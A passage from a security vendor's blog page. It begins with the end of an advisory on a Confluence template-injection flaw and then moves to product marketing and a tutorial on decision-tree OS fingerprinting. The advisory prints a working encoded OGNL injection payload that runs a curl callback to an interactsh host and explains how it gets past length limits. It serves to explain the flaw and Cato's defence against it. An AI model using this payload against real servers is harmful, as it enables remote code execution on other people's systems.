the built-in security measures:  #request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(String, Object). This chain starts at the request object, utilizing a default key value in the Velocity engine, to reach an OGNL class. The astute reader will know where this is going – OGNL expressions are notoriously dangerous and have been used in the past to achieve code execution on Confluence instances as well as other popular web applications.  [boxlink link="https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/"] Cato Networks SASE Threat Research Report H2/2022 | Download the Report [/boxlink] Lastly, a common way to evaluate OGNL expressions is with the  findValue method, which takes a string and an object as parameters and returns the value of the OGNL expression in the string, evaluated on the object. For example, findValue("1+1", null) would return 2. This is exactly what was shown in this proof of concept.   Note that findValue is not a function belonging to Struts but to the OGNL library. This means that the input ingested by findValue isn’t verified by Struts’ security measures, in effect allowing code injection and execution.  A content length limit exists, limiting the number of characters allowed in the expression used for exploitation but it is bypassed using the #parameters map and is then utilized to pass the actual arguments for execution.  The final payload being injected would look something like the below, as we see it makes use of the #request and #parameters maps in addition to chaining the aforementioned functions and classes:  label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"})  Cato’s analysis and response  From our data and analysis at Cato’s Research Labs we have seen multiple exploitation attempts of the CVE across Cato customer networks immediately following the availability of a public POC (Proof of Concept) of the attack.   Cato deployed IPS signatures to block any attempts to exploit the RCE in just 24 hours from the date of the POC publication, protecting all Cato-connected edges – sites, remote users, and cloud resources — worldwide from January 23rd, 2024.  Nonetheless, Cato recommends upgrading all vulnerable Confluence instances to the latest versions released by Atlassian.  References  https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ https://jira.atlassian.com/browse/CONFSERVER-93833

Cato XDR Proves to Be a “Timesaver” for Redner’s Markets

“The Cato platform gave us better visibility, saved time on incident response, resolved application issues, and improved network performance ten-fold.”   Nick Hidalgo, Vice President of... Read ›
Cato XDR Proves to Be a “Timesaver” for Redner’s Markets “The Cato platform gave us better visibility, saved time on incident response, resolved application issues, and improved network performance ten-fold.”   Nick Hidalgo, Vice President of IT and Infrastructure at Redner’s Markets  At what point do security problems meet network architecture issues? For U.S. retailer Redner’s Markets, it was when the company’s firewall vendor required backhauling traffic just to gain visibility into traffic flows.   Pulling traffic from the company’s 75 retail locations across Pennsylvania, Maryland, and Delaware led to “unexplainable” application problems. Loyalty applications failed to work correctly. Due to the unstable network, some of the grocer’s pharmacies couldn’t fax in their orders.    Those and other complaints led Redner’s Markets’ vice president of IT and infrastructure, Nick Hidalgo, and his team to implement Cato SASE Cloud. “Transitioning to Cato allowed us to establish direct traffic paths from the branches, leading to a remarkable 10x performance boost and vastly improved visibility,” says Hidalgo. “The visibility you guys give us is better than any other platform we’ve had.”  [boxlink link="https://www.catonetworks.com/resources/protect-your-sensitive-data-and-ensure-regulatory-compliance-with-catos-dlp/"] Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato’s DLP | Download the White Paper [/boxlink] Redner’s Markets’ Trials Cato XDR   When the opportunity came to evaluate Cato XDR, Hidalgo and his team signed up for the early availability program. “With our firewall vendor’s XDR platform, we only get half the story. We can see the endpoint process that spawned the story, but we lack the network context. Remediating incidents requires us to jump between three different screens.”  By contrast, Cato XDR provides an Incident Detection and Response solution spanning network detection response (NDR) and endpoint detection response (EDR) domains. More than eight native, endpoint and network sensors feed Cato XDR - NGFW, SWG, ATP, DNS, ZTNA, CASB, DLP, RBI, and EPP. Typically, XDR platforms come with one or two native sensors and for most that means native data only from their EPP solution Cato XDR can also ingest data from third-party sensors.   Cato automatically collects related incidents into detailed Gen-AI “stories”  using this rich dataset with built-in analysis and recommendations. These stories enable analysts to quickly prioritize, investigate, and respond to threat.AI-based threat-hunting capabilities create a prioritized set of suspected incident stories. Using Gen-AI, SOC analysts can efficiently manage and act upon stories using the incident analysis workbench built into the Cato management application.  With Cato, Hidalgo found XDR adoption and implementation to be simple. “We fully deployed the Cato service easily, and each time we turn on a capability, we immediately start seeing new stories,” he says. “We enabled Data Loss Prevention (DLP) and immediately identified misuse of confidential information at one of our locations.”  Having deployed Cato XDR and Cato EPP, Hidalgo gains a more holistic view of an incident. “Within our events screen, we now have a single view showing us all of the network and endpoint events relating to a story.”   More broadly, Cato’s combination of deep incident insight and converged incident response tools has made his team more efficient in remediating incidents. “Cato XDR is a timesaver for us,” he says. “The XDR cards let us see all the data relating to an incident in one place, which is valuable. Seeing the flow of the attack through the network – the source of the attack, the actions taken, the timeframe, and more – on one page saves a lot of time. If a user has a network issue, I do not have to jump to various point product portals to determine where the application is being blocked.”  Overall, the Cato platform and Cato XDR have proved critical for Redner’s Markets. “The Cato platform gave us better visibility, saved time on incident response, resolved application issues, and improved network performance ten-fold.” 

Cato Networks Unveils Groundbreaking SASE-based XDR & EPP: Insights from Partners  

An Exclusive Interview with Art Nichols and Niko O’Hara  In the ever-evolving landscape of cybersecurity, Cato Networks introduced the world’s first SASE-based extended detection and... Read ›
Cato Networks Unveils Groundbreaking SASE-based XDR & EPP: Insights from Partners   An Exclusive Interview with Art Nichols and Niko O’Hara  In the ever-evolving landscape of cybersecurity, Cato Networks introduced the world’s first SASE-based extended detection and response (XDR) and the first SASE-managed endpoint protection platform (EPP).   This Cato SASE Cloud platform marks a significant milestone in the industry’s journey towards a more secure, converged, and responsive cybersecurity platform. By integrating SASE with XDR and EPP capabilities, this innovative platform represents a pivotal shift in how cybersecurity challenges are addressed, offering a unified and comprehensive approach to threat detection and response for enterprises.  Our Cato XDR tool, uniquely crafted by analysts for analysts, exemplifies this shift. It enables servicing more customers with fewer analysts, thereby increasing revenue, and its ability to remediate threats faster than other solutions leads to better security and greater satisfaction for the end customer.  Moreover, our Cato EPP amplifies this value proposition by increasing wallet share and value to the customer simultaneously. It goes beyond mere vendor consolidation, delving deeper into capabilities convergence.  To understand the impact of this launch on the channel, I spoke with Art Nichols, CTO of Windstream Enterprise, and Niko O’Hara, Senior Director of Engineering of AVANT.  [boxlink link="https://www.catonetworks.com/resources/the-future-of-the-sla-how-to-build-the-perfect-network-without-mpls/"] The Future of the SLA: How to Build the Perfect Network Without MPLS | Download the eBook [/boxlink] Art Nichols: The CTO’s Take on the Transformative Power of SASE-based XDR and SASE-managed EPP  “The convergence of XDR and EPP into SASE is not just another product; it’s a game-changer for the industry,” Art said. “The innovative integration of these capabilities brings together advanced threat detection, response capabilities, and endpoint security within a unified, cloud-native architecture—revolutionizing the way enterprises protect their networks and data against increasingly sophisticated cyber threats.”  Art highlighted how this integration simplifies the complex landscape of cybersecurity. “Enterprises often struggle with the complexity that comes with managing multiple security tools and platforms. The Cato SASE Cloud platform consolidates these core SASE features into a unified framework, making it easier for businesses to elevate network performance and security, and manage their security posture more effectively.”  “At Windstream Enterprise, we’ve always focused on providing cutting-edge solutions to enterprises. Cato’s SASE-based XDR and EPP align perfectly with our ethos. It’s about bringing together comprehensive security and advanced network capabilities in one seamless package.”  Niko O’Hara: The Engineer on the Enhanced Security and Efficiency  Niko, known for his strategic approach to engineering solutions, shared his insights on the operational benefits.   “The extended detection and response capabilities integrated within a SASE framework means we are not just preventing threats; we are actively detecting and responding to them in real-time. This proactive approach is critical in today’s dynamic threat landscape.”  “What sets us apart is partnering with a SASE vendor like Cato Networks, who is not just participating in the market but leading and shaping it. Our vision aligns with companies that are pioneers, not followers.”  “AVANT has already been at the forefront of adopting technologies that not only enhance security but also improve operational efficiency. The SASE-based XDR and EPP from Cato Networks embodies this principle.”  A New Era for Channel Partners and Distributors  Both Art and Niko agree that this innovation heralds a new era for channel partners and distributors. “The channel needs solutions that are not only technologically advanced but also commercially viable,” Art said. “With the Cato SASE-based XDR, enterprises gain a security and networking solution that scales with their needs, offering unparalleled security without the complexity.”  Niko added, “This launch empowers Technology Services Distributors like AVANT to deliver more value to enterprises. We are moving beyond traditional security models to a more integrated, intelligent approach. It’s a win-win for everyone involved.”  Conclusion  As the Global Channel Chief of Cato Networks, I am thrilled to witness the enthusiasm and optimism of our channel partners. The introduction of the world’s first SASE-based XDR and SASE-managed EPP is not just a testament to Cato’s innovation but also a reflection of our commitment to our partners and their enterprises. Together, we are setting a new standard in cybersecurity, one that promises enhanced security, efficiency, and scalability. 

Cato XDR: A SASE-based Approach to Threat Detection and Response

Security Analysts Need Better Tools  Security analysts continue to face an ever-evolving threat landscape, and their traditional approaches are proving to be quite limited.  They... Read ›
Cato XDR: A SASE-based Approach to Threat Detection and Response Security Analysts Need Better Tools  Security analysts continue to face an ever-evolving threat landscape, and their traditional approaches are proving to be quite limited.  They continue to be overrun with security alerts, and their SIEMs often fail to properly correlate all relevant data, leaving them more exposed to cyber threats.  These analysts require a more effective method to understand threats faster and reduce security risks in their environment.    Extended Detection and Response (XDR) was introduced to improve security operations and eliminate these risks.  XDR is a comprehensive cybersecurity solution that goes beyond traditional security tools.  It was designed to provide a more holistic approach to threat detection and response across multiple IT environments. However, standard XDR tools have a data quality issue because to process threat data, it must be normalized into a structure the XDR understands.  This often results in incomplete or reduced data, and this inconsistency makes threats harder to detect.   SASE-based XDR   Cato Networks realized that XDR needed to evolve.  It needed to overcome the data-quality limitations of current XDR solutions to produce cleaner data for more accurate threat detection.  To achieve this, the way XDR ingested and processed data needed to change, and it would start with the platform.  This next evolution of XDR would be built into a SASE platform to enable a more comprehensive approach to security operations.   SASE-based XDR is a completely different approach to security operations and overcomes the limitations of standard XDR solutions. Built-in native sensors overcome the data quality issues to produce high-quality data that requires no integration or normalization. Captured data through these sensors are populated into a single data lake and this allows AI/ML algorithms to train on this data to create quality XDR incidents.  [boxlink link="https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/"] Cato Networks SASE Threat Research Report H2/2022 | Download the Report [/boxlink] AI/ML in SASE-based XDR  AI/ML serves an important role in SASE-based XDR, with advanced algorithms providing more accuracy in correlation and detection engines.  Advanced ML models train on petabytes of data and trillions of events from a single data lake.  Data populated through the native sensors requires no integration or normalization and no need for data reduction.  The AI/ML is trained on this raw data to eliminate missed detections and false positives, and this results in high-quality threat incidents.    SASE-based XDR Threat Incidents  SASE-based XDR detects and acts on various types of cyber threats.  Every threat in the management console is considered an incident that presents a narrative of a threat from its inception until its final resolution.  These incidents are presented in the Dashboard, providing a roadmap for security analysts to understand the detected threats.  SASE-based XDR generates three types of incidents:   Threat Prevention – Correlates Block event signals that were generated from prevention engines, such as IPS.    Threat Hunting – Detects elusive threats that do not have signatures by correlating various network signals using ML and advanced heuristics.   Anomaly Detection – Detects unusual suspicious usage patterns over time using advanced statistical models and UEBA (User and Entity Behavior Analytics).   Threat Intelligence for SASE-based XDR  SASE-based XDR contains a reputation assessment system to eliminate false positives.  This system uses machine learning and AI to correlate readily available networking and security information and ingests millions of IoCs from 250+ threat intelligence sources.  It scores them using real-time network intelligence gathered by ML models.    Threat intelligence enrichment strengthens SASE-based XDR by increasing the quality of data that is consumed by the XDR engine, thus increasing the accuracy of the XDR incidents.  Security teams are now better equipped to investigate their incidents and remediate cyber threats in their environment.    Cato XDR: The Game-Changer  Cato XDR is the industry’s first SASE-based XDR solution that eases the burden of security teams and brings a 360-degree approach to security operations.  It uses advanced AI/ML algorithms for increased accuracy in XDR’s correlation and detection engines to create XDR stories.  It also uses a reputation assessment engine for threat intelligence to score threat sources and identify and eliminate false positives.  Cato XDR also overcomes the data quality issue of standard XDR solutions.  The Key to this is native sensors that are built into the SASE platform.  These high-quality sensors produce quality metadata that requires no integration or normalization.  This metadata is populated into our massive data lake, and Machine Learning algorithms train on this to map the threat landscape.  Cato XDR is a true game-changer that presents a cleaner path to more efficient security operations.  With XDR and security built into the platform, the results are cleaner and more accurate detection, leading to faster, more efficient investigation and remediation.  For more details, read more about XDR here. 

Cato Taps Generative AI to Improve Threat Communication

Today, Cato is furthering our goal of simplifying security operations with two important additions to Cato SASE Cloud. First, we’re leveraging generative AI to summarize... Read ›
Cato Taps Generative AI to Improve Threat Communication Today, Cato is furthering our goal of simplifying security operations with two important additions to Cato SASE Cloud. First, we’re leveraging generative AI to summarize all the indicators related to a security issue. Second, we tapped ML to accelerate the identification and ranking of threats by finding similar past threats across an individual customer’s account and all Cato accounts. Both developments build on Cato’s already extensive use of AI and ML. In the past, this work has largely been behind the scenes, such as performing offline analysis for OS detection, client classification, and automatic application identification. Last June, Cato extended those efforts and revolutionized network security with arguably the first implementation of real-time, machine learning-powered protection for malicious domain identification. But the additions today will be more noticeable to customers, adding new visual elements to our management application. Together they help address practical problems security teams face every day, whether it is in finding threats or communicating those findings with other teams. Alone, new AI widgets would be mere window dressing to today’s enterprise security challenges. But coupling AI and ML with Cato’s elegant architecture represents a major change in the enterprise security experience. Solving the Cybersecurity Skills Problem Begins with the Security Architecture It's no secret that security operations teams are struggling. The flood of security alerts generated by the many appliances and tools across your typical enterprise infrastructure makes identifying the truly important alerts impossible for many teams. This “alert fatigue” is not only impacting team effectiveness in protecting the enterprise, but it’s also impacting the quality of life of its security personnel.  In a  survey conducted by Opinium, 93% of respondents say IT management and cyber-security risk work has forced them to cancel, delay, or interrupt personal commitments. Not a good thing when you’re trying to retain precious security talent. A recent Cybersecurity Workforce Study from ISC2 found that 67% of surveyed cybersecurity professionals reported that their organization has a shortage of cybersecurity staff needed to prevent and troubleshoot security issues. Another study from Enterprise Study Group (ESG) as reported in Security Magazine, found that 7 out of 10 surveyed organizations (71%) report being impacted by the cybersecurity skills shortage. Both problems could be addressed by simplifying enterprise infrastructure. The many individual security tools and appliances used in enterprise networks to connect and protect their users require security teams to juggle multiple interfaces to solve the simplest of problems. The security analyst’s lack of deep visibility into networking and security data inhibits their ability to diagnose threats. The ongoing discovery of new vulnerabilities in appliances, even security appliances, puts stress on security teams as they race to evaluate risks and patch systems. [boxlink link="https://catonetworks.easywebinar.live/registration-everything-you-wanted-to-know-about-ai-security"] Everything You Wanted To Know About AI Security But Were Afraid To Ask | Watch the Webinar [/boxlink] This is why Cato rethought networking and security operations eight years ago by first solving the underlying architectural problems. The Cato SASE Cloud is a platform first, converging core security tools – SWG, CASB, DLP, RBI, ZTNA/SDP, and FWaaS with Advanced Threat Prevention (IPS, DNS Security, Next Generation Anti-malware). Those tools share the same admin experience and interface, so learning them is easier. They share the same underlying data lake, which is populated with networking data as well, providing the richest dataset possible for security teams to hunt for threats. The Cato platform is always current, protecting users everywhere against new and rising threats without overburdening a company’s security team. Across that platform, Cato has been running AI and machine learning (ML) algorithms to make the platform even simpler and smarter. We combine AI and ML with HI – human intelligence – of our vast team of security experts to eliminate false positives, identify threats faster, and recognize new devices connecting to the network with higher precision. Two New Additions to Cato’s Use of AI and ML It’s against this backdrop that Cato has expanded our AI work in two important ways towards achieving the goal of the experience of enterprise security simpler and smarter. We recognize that security teams need to share their insights with other IT members. It can be challenging for security experts to summarize succinctly the story behind a threat and for novice security personnel to interpret a dashboard of indicators. So, we tapped generative AI to write a one-paragraph summary of the security indicators leading to an analyst’s given conclusion. Story summary is automatically generated by generative AI. We also wanted to find a way to identify and rank threats even faster and more accurately. We tapped AI and ML in the past to accomplish this goal, but today we are expanding those efforts. Using distancing algorithms, we identify similarities between new security stories with other stories in a customer’s account and across all Cato accounts. This means that Cato customers directly benefit from knowledge and experience gained across the entire Cato community. And that’s significant because there’s a very, very good chance that the story you’re trying to evaluate today was already seen by some other Cato customer. So, we can make that identification and rank the threat for you faster and easier. Story similarity quickly identifies and ranks new stories based on past analysis of other similar stories in a customer’s or third-party accounts. A SASE Platform and AI/ML – A Winning Combination The expansion of AI/ML into threat detection analytics and its use in summarizing security findings are important in simplifying security operations. However, AI/ML alone cannot address the range of security challenges facing today’s enterprise. Organizations must first address the underlying architectural issues that make security so challenging. Only by replacing disparate security products and tools with a single, converged global platform can AI be something more than, well, window dressing. For a more technical analysis of our use of Generative AI, see this blog from the Cato Labs Research team.

Whistleblowers of a Fake SASE are IT’s Best Friends 

History taught us that whistleblowers can expose the darkest secrets and wrongdoing of global enterprises, governments and public services; even prime ministers and presidents. Whistleblowers... Read ›
Whistleblowers of a Fake SASE are IT’s Best Friends  History taught us that whistleblowers can expose the darkest secrets and wrongdoing of global enterprises, governments and public services; even prime ministers and presidents. Whistleblowers usually have a deep sense of justice and responsibility that drives them to favor the good of the many over their own. Often, their contribution is really appreciated only in hindsight.   In an era where industry buzz around new technologies such as SASE is exploding, vendors who are playing catch-up can be tempted to take shortcuts, delivering solutions that look like the real thing but really aren’t. With SASE, it is becoming very hard for IT teams to filter through the noise to understand what is real SASE and what is fake. What can deliver the desired outcomes and what might lead to a great disappointment.   Helpfully for IT teams, the whistleblowers of fake SASE solutions have already blown their whistles loud and clear. All we need to do is listen to their warnings, to the red flags they are waiving in our faces, and carefully examine every SASE (true or fake) solution to identify its’ real essence.  The Fragmented Data Lake Whistleblower  As more and more legacy products such as firewalls, SWG, CASB, DLP, SD-WAN and others are converging into one SASE platform, it can only be expected that all the events they generate will converge as well, forming one unified data lake that can be easily searched through and filtered. This is still not the case with many vendor’s offerings.  Without a ready-made, unified data lake, enterprises need a SIEM solution, into which all the events from the different portfolio products will be ingested. This makes the work of SIEM integration and data normalization a task for the IT team, rather than a readily available functionality of the SASE platform.  Beyond the additional work and complexity, event data normalization almost always means data reduction, leading to less visibility about what is really happening on the enterprise network and security. Conversely, the unified data lake from a true single-vendor SASE solution will be populated with native data that gives rich visibility and a real boost to advanced tools such as XDR.  Think carefully if an absence of a ready-made unified data lake is something you are willing to compromise on, or should this red flag, forcefully waved by the data lake whistleblower, be one of your key decision factors.  The Multiple Management Apps Whistleblower  One of the most frustrating and time-consuming situations in the day-to-day life of IT teams is jumping between oh so many management applications to understand what is happening, what needs attention, troubleshooting issues, policy configuration and even periodic auditing.  SASE is meant to dramatically reduce the number of management applications for the enterprise. It should be a direct result of vendor consolidation and product convergence. It really should.  But some vendors (even big, established ones) offer a SASE built with multiple products and (you guessed it) multiple management applications, rather than a single-platform SASE with one management application.  With these vendors, it’s bad enough having to jump between management applications, but it can also mean having to implement policies separately in multiple applications.   The management whistleblower is now exhausting the air in her lungs, drawing your attention to what might not be the time saving and ease of use you may be led to expect. Some might like the overflow of management applications in their job, but most don’t.   Multiple managements applications can be hidden by a ‘management-of-managements’ layer. It might be a good solution in theory, but in practice – it means that every change, bug fix, and new feature needs to be implemented and reflected in all the management applications. Are you sure your vendor can commit to that?   [boxlink link="https://catonetworks.easywebinar.live/registration-making-sure-sase-projects-are-a-success"] Making Sure SASE Projects Are a Success | Watch the Webinar [/boxlink] The Asymmetric PoPs Whistleblower  This one is probably the hardest one to expose, but once seen – it cannot be unseen.  Vendors who did not build their SASE from the ground up as a cloud-native software often take shortcuts in the race to market. They create service PoPs (Points of Presence) by deploying their legacy point products as virtual machines on a public cloud like GCP, AWS or Azure. This is an expensive strategy to take on, and an extremely complex operation to build and maintain with an SLA that fits critical IT infrastructure requirements.  Some may think this is meaningless, and that as long as the customer is getting the service they paid for, why should they care. Well, here is why.  To reduce the high IaaS costs and the operational complexity, such vendors will intentionally avoid offering all their SASE capabilities from all of their PoPs. The result of this asymmetric PoP architecture is  degraded application performance and user experience, due to the need to route some or all traffic to a distant PoP for processing and inspection. So, when users come in complaining, do you think that saying you are supporting the cost saving of the SASE vendor will be a reasonable explanation?  The asymmetric PoPs whistleblower recommends that you double check with every SASE vendor that all their PoPs are symmetric, and that wherever your users and applications are, all the SASE services will be delivered from the nearest one PoP.   Epilogue  Whistleblowers are usually not fun to listen to. They challenge and undermine our believes and perception, taking us out of our comfort zone.  The three whistleblowers here mean no harm, only wanting to help minimize the risk of failure and disappointment. They blow their whistles and wave their red flags to warn you to proceed with caution, educate yourself, and select your strategic SASE vendor with eyes wide open. 

3 Things CISOs Can Immediately Do with Cato

Wherever you are in your SASE or SSE journey, it can be helpful knowing what other CISOs are doing once they’ve implemented these platforms. Getting... Read ›
3 Things CISOs Can Immediately Do with Cato Wherever you are in your SASE or SSE journey, it can be helpful knowing what other CISOs are doing once they've implemented these platforms. Getting started with enhanced security is a lot easier than you might think. With Cato’s security services being delivered from a scalable cloud-native architecture at multiple global points of presence, the value is immediate. In this blog post, we bring the top three things you, as a CISO, can do with Cato. From visibility to real-time security to data sovereignty, Cato makes it easy to create consistent policies, enable zero trust network access, and investigate security and networking issues all in one place. To read more details about each of these steps, understand the inner workings of Cato’s SASE/SSE and to see what you would be able to view in Cato’s dashboards, you can read the ebook “The First 3 Things CISOs Do When Starting to Use Cato", which this blog post is based on, here. Now let’s dive into the top three capabilities and enhancements CISOs gain from Cato: 1. Comprehensive Visibility With Cato, CISOs achieve complete visibility into all activity, once traffic flows through the Cato SASE Cloud. This includes security events, networking and connectivity events for all users and locations connected to the service. This information can be viewed in the Cato Management Application: The events page shows the activity and enables filtering, which supports investigation and incident correlation. The Cloud Apps Dashboard presents a holistic and interactive view of application usage, enabling the identification of Shadow IT. Cato’s Apps Catalog provides an assessment of each application’s profile and a risk score, enabling CISOs to evaluate applications and decide if and how to enable the app and which policies to configure. Application analytics show the usage of a specific application, enabling CISOs or practitioners to identify trends for users, sites and departments. This helps enforce zero trust, design policies and identify compromised applications. Comprehensive visibility supports day-to-day management as well as the ability to easily report to the board on application usage, risk level and blocked threats. It also supports auditing needs. [boxlink link="https://www.catonetworks.com/resources/feedback-from-cisos-the-first-three-things-to-do-when-starting-to-use-cato/"] Feedback from CISOs: The First Three Things to do When Starting to Use Cato | Download the eBook [/boxlink] 2. Consistent Real-Time Threat Prevention Cato’s SSE 360’s cloud-native architecture enables protecting all traffic with no computing limitation. Multiple security updates are carried out every day. The main services include: Real Time Threat Prevention Engines - FWaaS, SWG, IPS, Next-Generation Anti-Malware and more are natively a part of Cato’s SASE Platform, detecting and blocking threats, and always up-to-date. Cato’s threats dashboard - A high-level view of all threat activity, including users, threat types and threat source countries, for investigation or policy change considerations.  MITRE ATT&CK dashboard -  A new dashboard that aligns logged activity with the MITRE ATT&CK framework, enabling you to see the bigger picture of an attack or risk. 24x7 MDR service provided by Cato’s SOC - A service that leverages ML to identify anomalies and Cato’s security experts to investigate them. 3. Data Sovereignty Cato provides DLP and CASB capabilities to support data governance. DLP prevents sensitive information, like source code, PCI data, or PII data, from being uploaded or downloaded. The DLP dashboard shows how policies are configured and performing, enabling the finetuning of DLP rules and helping identify data exfiltration attempts or the need for user training. CASB controls how users interact with SaaS applications and prevents users uploading data to third party services as well as establishing broader security standards based on compliance, native security features, and risk score Future Growth for CISOs CISOs who have adopted Cato’s SASE or SSE360 can readily expect future growth, since appliance deployment and supply chain constraints are no longer blockers for their progress. You can easily onboard new users and locations to gain visibility and protection and policy application. It’s also easy to add new functionalities and enable new policies, reducing the time to value for any new capability. With Cato, your company’s policies are consistently enforced and all your users and locations are protected from the latest threats. Read more details about each of these capabilities in the ebook “The First 3 Things CISOs Do When Starting to Use Cato" here.

Machine Learning in Action – An In-Depth Look at Identifying Operating Systems Through a TCP/IP Based Model 

In the previous post, we’ve discussed how passive OS identification can be done based on different network protocols. We’ve also used the OSI model to... Read ›
Machine Learning in Action – An In-Depth Look at Identifying Operating Systems Through a TCP/IP Based Model  In the previous post, we’ve discussed how passive OS identification can be done based on different network protocols. We’ve also used the OSI model to categorize the different indicators and prioritize them based on reliability and granularity. In this post, we will focus on the network and transport layers and introduce a machine learning OS identification model based on TCP/IP header values.  So, what are machine learning (ML) algorithms and how can they replace traditional network and security analysis paradigms? If you aren’t familiar yet, ML is a field devoted to performing certain tasks by learning from data samples. The process of learning is done by a suitable algorithm for the given task and is called the “training” phase, which results in a fitted model. The resulting model can then be used for inference on new and unseen data.  ML models have been used in the security and network industry for over two decades. Their main contribution to network and security analysis is that they make decisions based on data, as opposed to domain expertise (i.e., they are data-driven). At Cato we use ML models extensively across our service, and in this post specifically we’ll delve into the details of how we enhanced our OS identification engine using a TCP/IP based model.   For OS identification, a network analyst might create a passive network signature for detecting a Windows OS based on his knowledge on the characteristics of the Windows TCP/IP stack implementation. In this case, he will also need to be familiar with other OS implementations to avoid false positives. However, with ML, an accurate network signature can be produced by the algorithm after training on several labeled network flows from different devices and OSs. The differences between the two approaches are illustrated in Figure 1.  Figure 1: A traditional paradigm for writing identification rules vs. a machine learning approach.  In the following sections, we will demonstrate how an ML model that generates OS identification rules can be created using a Decision Tree. A decision tree is a good choice for our task for a couple of reasons. Firstly, it is suitable for multiclass classification problems, such as OS identification, where a flow can be produced from various OS types (Windows, Linux, iOS, Android, Linux, and more). But perhaps even more importantly, after being trained, the resulting model can be easily converted to a set of decision rules, with the following form:  if condition1 and condition 2 … and condition n then label   This means that your model can be deployed on environments with minimal dependencies and strict performance limits, which are common requirements for network appliances such as packet filtering firewalls and deep packet inspection (DPI) intrusion prevention systems (IPS).  How do decision trees work for classification tasks?   In this section we will use the following example dataset to explain the theory behind decision trees. The dataset represents the task of classifying OSs based on TCP/IP features. It contains 8 samples in total, captured from 3 different OSs: Linux, Mac, and Windows. From each capture, 3 elements were extracted: IP initial time-to-live (ITTL), TCP maximum segment size (MSS), and TCP window size.   Figure 2: The training dataset with 8 samples, 3 features, and 3 classes.  Decision trees, as their name implies, use a tree-based structure to perform classification. Each node in the root and internal tree levels represents a condition used to split the data samples and move them down the tree. The nodes at the bottom level, also called leaves, represent the classification type. This way, the data samples are classified by traversing the tree paths until they reach a leaf node. In Figure 3, we can observe a decision tree created from our dataset. The first level of the tree splits our data samples based on the “IP ITTL” feature. Samples with a value higher than 96 are classified as a Windows OS, while the rest traverse down the tree to the second level decision split.  Figure 3: A simple decision tree for classifying an OS.  So, how did we create this tree from our data? Well, this is the process of learning that was mentioned earlier. Several variations exist for training a decision tree; In our example, we will apply the well-known Classification and Regression Tree (CART) algorithm.  The process of building the tree is done from top to bottom, starting from the root node. In each step, a split criterion is selected with the feature and threshold that provide the best “split quality” for the data in the current node. In general, split criterions that divide the data into groups with more homogeneous class representation (i.e., higher purity) are considered to have a better split quality. The CART algorithm measures the split quality using a metric called Gini Impurity. Formally, the metric is defined as:  Where 𝐶 denotes the number of classes in the data (in our case, 3), and 𝑝 denotes the probability for that class, given the data in the current node. The metric is bounded between 0 and 1 the represent the degree of node impurity. The quality of the split criterion is then defined by the weighted sum of the Gini Impurity values of the nodes below. Finally, the split criterion that gives to lowest weighted sum of the Gini Impurities for the bottom nodes is selected.   In Figure 4, we can see an example for selecting the first split criterion of the tree. The root node of tree, containing all data samples, has the Gini Impurity values of:  Then, given the split criterion of “IP ITTL <= 96”, the data is split to two nodes. The node that satisfies the condition (left side), has the Gini Impurity values of:    While the node that doesn’t, has the Gini Impurity values of:  Overall, the weighted sum for this split is:  This value is the minimal Gini Impurity of all the candidates and is therefore selected for the first split of the tree. For numeric features, the CART algorithm selects the candidates as all the midpoints between sequential values from different classes, when sorted by value. For example, when looking at the sorted “IP ITTL” feature in the dataset, the split criterion is the midpoint between IP ITTL = 64, which belongs to a Mac sample, and IP ITTL = 128, which belongs to a Windows sample. For the second split, the best split quality is given by the “TCP MSS” features, from the midpoint between TCP MSS = 1386, which belongs to a Mac sample, and TCP MSS = 1460, which belongs to a Linux sample.  Figure 4: Building a tree from the data – level 1 and level 2. The tree nodes display: 1. Split criterion, 2. Gini Impurity value, 3. Number of data sample from each class.  In our example, we fully grow our tree until all the leaves have a homogenous class representation, i.e., each leaf has data samples from a single class only. In practice, when fitting a decision tree to data, a stopping criterion is selected to make sure the model doesn’t overfit the data. These criteria include maximum tree height, minimum data samples for a node to be considered a leaf, maximum number of leaves, and more. In case the stopping criterion is reached, and the leaf doesn’t have a homogeneous class representation, the majority class can be used for classification.   [boxlink link="https://catonetworks.easywebinar.live/registration-everything-you-wanted-to-know-about-ai-security"] Everything You Wanted To Know About AI Security But Were Afraid To Ask | Watch the Webinar [/boxlink] From tree to decision rules  The process of converting a tree to rules is straight forward. Each route in the tree from root to leaf node is a decision rule composed from a conjunction of statements. I.e., If a new data sample satisfies all of statements in the path it is classified with the corresponding label.   Based on the full binary tree theorem, for a binary tree with 𝑛 nodes, the number of extracted decision rules is (𝑛+1)/ 2. In Figure 5, we can see how the trained decision tree with 5 nodes, is converted to 3 rules.   Figure 5: Converting the tree to a set of decision rules.  Cato’s OS detection model  Cato’s OS detection engine, running in real-time on our cloud, is enhanced by rules generated by a decision tree ML model, based on the concepts we described in this post. In practice, to gain a robust and accurate model we trained our model on over 10k unique labeled TCP SYN packets from various types of devices. Once the initial model is trained it also becomes straightforward to re-train it on samples from new operating systems or when an existing networking implementation changes.  We also added additional network features and extended our target classes to include embedded and mobile OSs such as iOS and Android. This resulted in a much more complex tree that generated 125 different OS detection rules. The resulting set of rules that were generated through this process would simply not have been feasible to achieve using a manual work process. This greatly emphasizes the strength of the ML approach, both the large scope of rules we were able to generate and saving a great deal of engineering time.  Figure 6: Cato’s OS detection tree model. 15 levels, 249 nodes, and 125 OS detection rules.  Having a data-driven OS detection engine enables us to keep up with the continuously evolving landscape of network-connected enterprise devices, including IoT and BYOD (bring your own device). This capability is leveraged across many of our security and networking capabilities, such as identifying and analyzing security incidents using OS information, enforcing OS-based connection policies, and improving visibility into the array of devices visible in the network.  An example of the usage of the latter implementation of our OS model can be demonstrated in Figure 7, the view of Device Inventory, a new feature giving administrators a full view of all network connected devices, from workstations to printers and smartwatches. With the ability to filter and search through the entire inventory. Devices can be aggregated by different categories, such as OS shown below or by the device type, manufacturer, etc.   Figure 7: Device Inventory, filtering by OS using data classified using our models However, when inspecting device traffic, there is other significant information besides OS we can extract using data-driven methods. When enforcing security policies, it is also critical to learn the device hardware, model, installed application, and running services. But we'll leave that for another post.  Wrapping up  In this post, we’ve discussed how to generate OS identification rules using a data-driven ML approach. We’ve also introduced the Decision Tree algorithm for deployment considerations on minimal dependencies and strict performance limits environments, which are common requirements for network appliances. Combined with the manual fingerprinting 